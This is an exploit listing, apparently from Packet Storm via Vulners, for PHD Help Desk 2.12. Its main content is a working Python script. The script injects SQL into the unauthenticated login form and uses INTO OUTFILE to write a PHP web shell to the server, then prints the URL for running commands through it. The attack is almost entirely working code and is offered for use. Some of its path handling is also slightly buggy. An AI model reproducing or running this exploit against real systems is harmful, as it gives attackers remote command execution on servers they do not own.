Lucene search
K

PHD Help Desk 2.12 SQL Injection

🗓️ 04 Jun 2013 00:00:00Reported by droneType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

PHD Help Desk 2.12 SQL Injection Exploit practic

Code
`# Exploit Title: PHD Help Desk 2.12 SQLi  
# Date: 05/24/2013  
# Exploit Author: drone (@dronesec)  
# More information: http://forelsec.blogspot.com/2013/06/phd-help-desk-212-sqli-and-xss.html  
# Vendor Homepage: http://www.p-hd.com.ar/  
# Software Link: http://downloads.sourceforge.net/project/phd/phd_released/phd%202.12/phd_2_12.zip  
# Version: 2.12  
# Tested on: Ubuntu 12.04 (apparmor disabled)  
  
""" This app is so full of SQLi & XSS; if you're looking for  
practice with real web apps, this is a good place to go.  
  
You don't need auth for this.  
"""  
from argparse import ArgumentParser  
import string  
import random  
import urllib, urllib2  
import sys  
  
def run(options):  
print '[!] Dropping web shell on %s...'%(options.ip)  
  
shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))  
  
# <? php system($_GET["rr"]); ?>  
data = urllib.urlencode({'operador':('\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'  
',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE'  
' \'{0}/{1}.php'.format(options.path,shell)),  
'contrasenia':'pass',  
'submit':'Enter',  
'captcha':''})  
  
urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data)  
print '[!] Shell dropped. http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell)  
  
def parse():  
parser = ArgumentParser()  
parser.add_argument('-i',help='server address',action='store',dest='ip')  
parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store',  
default='/phd_2_12', dest='rootp')  
parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell',  
default='/var/www/phd_2_12/', action='store', dest='path')  
  
options = parser.parse_args()  
if not options.ip:  
parser.print_help()  
sys.exit(1)  
  
options.path = options.path if options.path[-1] != '/' else options.path[:-1]  
options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]  
return options  
  
if __name__=="__main__":  
run(parse())  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation